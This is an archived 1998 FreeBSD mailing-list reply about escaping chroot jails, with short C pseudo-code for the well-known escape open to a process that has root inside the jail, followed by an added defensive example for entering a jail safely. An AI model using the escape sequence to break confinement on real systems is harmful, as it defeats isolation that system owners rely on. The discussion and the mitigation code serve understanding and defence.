From: Eivind Eklund
To: Mike Smith, Harold Gutch
Cc: zhihuizhang, hackers
Subject: Re: Question on chroot()
Date: Tue, 17 Nov 1998 12:54:19 +0100
Message-ID: <19981117125419.28799@follo.net>
References: <19981115200813.B12524@foobar.franken.de> <199811152056.MAA14163@dingo.cdrom.com>
In-Reply-To: <199811152056.MAA14163@dingo.cdrom.com>; from Mike Smith on Sun, Nov 15, 1998 at 12:56:03PM -0800

On Sun, Nov 15, 1998 at 12:56:03PM -0800, Mike Smith wrote:
> > On Sun, Nov 15, 1998 at 09:56:32AM -0800, Mike Smith wrote:
> > > Breaking out of a chroot'ed environment is less easy if you're not
> > > root
> > Is this meant to be read as "more or less impossible", that is,
> > impossible unless the user can become root first (due to insecure
> > suid-root binaries in the chroot-environment etc.), or can users
> > really break out in more or less every situation (of course
> > assuming stuff like that they don't have any open filehandles
> > pointing to the outside in the beginning).
>
> It's quite difficult to break out of a chroot'ed environment, yes, and
> it's intended to be impossible, so obviously you can only get out
> through flaws in the implementation...

It is easy if you have root privileges inside the "jail".

    /* pseudo-code */
    mkdir("mybreakdir", 0700);
    breakfd = open(".", 0, 0);
    chroot("mybreakdir");
    fchdir(breakfd);
    for (i=0; i<1000; i++)
            chdir("..");
    chroot(".");

I'm not sure if you need the fchdir(); chroot() is not supposed to
affect your current directory.

I don't think anybody has fixed the above problem; it seems quite
difficult to fix (you have to know which FDs are inside and outside the
jail, which is non-trivial).

Eivind.
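As an added example (not part of Eivind's message or of any FreeBSD code), the jail-entry sequence that stays out of reach of the escape above: it needs root inside the jail and a directory handle outside it, so the cwd is moved inside before chroot() and root is dropped, and verified dropped, before anything untrusted runs. The directory /var/empty and the ids 65534 are assumed placeholders.

```c
#define _DEFAULT_SOURCE 1
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <unistd.h>

/* 1 if the process holds or can get back uid 0, 0 if root is really gone. */
int can_regain_root(void)
{
    if (geteuid() == 0)
        return 1;
    return setuid(0) == 0;       /* must fail with EPERM once unprivileged */
}

/* Enter `dir` as a jail and become the unprivileged uid/gid.
 * Returns 0 on success, -1 with errno set on failure. The order matters:
 *  - chdir(dir) before chroot(dir): chroot() does not move the cwd, so a cwd
 *    left outside the new root is the outside handle the escape above needs;
 *  - chroot(dir) while still root, since the call requires it;
 *  - setgroups/setgid/setuid afterwards, before anything untrusted runs:
 *    the escape needs a second chroot(), which is refused without uid 0. */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    if (uid == 0 || gid == 0) {            /* a jail that keeps root is no jail */
        errno = EINVAL;
        return -1;
    }
    if (chdir(dir) == -1)
        return -1;
    if (chroot(dir) == -1)
        return -1;
    if (setgroups(0, NULL) == -1 || setgid(gid) == -1 || setuid(uid) == -1)
        return -1;
    if (can_regain_root()) {               /* verify the drop, don't assume it */
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(void)
{
    /* Placeholder directory and ids; succeeds only when started as root. */
    if (enter_jail("/var/empty", 65534, 65534) == -1) {
        perror("enter_jail");
        return 1;
    }
    printf("jailed as uid %d; root cannot be regained\n", (int)getuid());
    return 0;
}
```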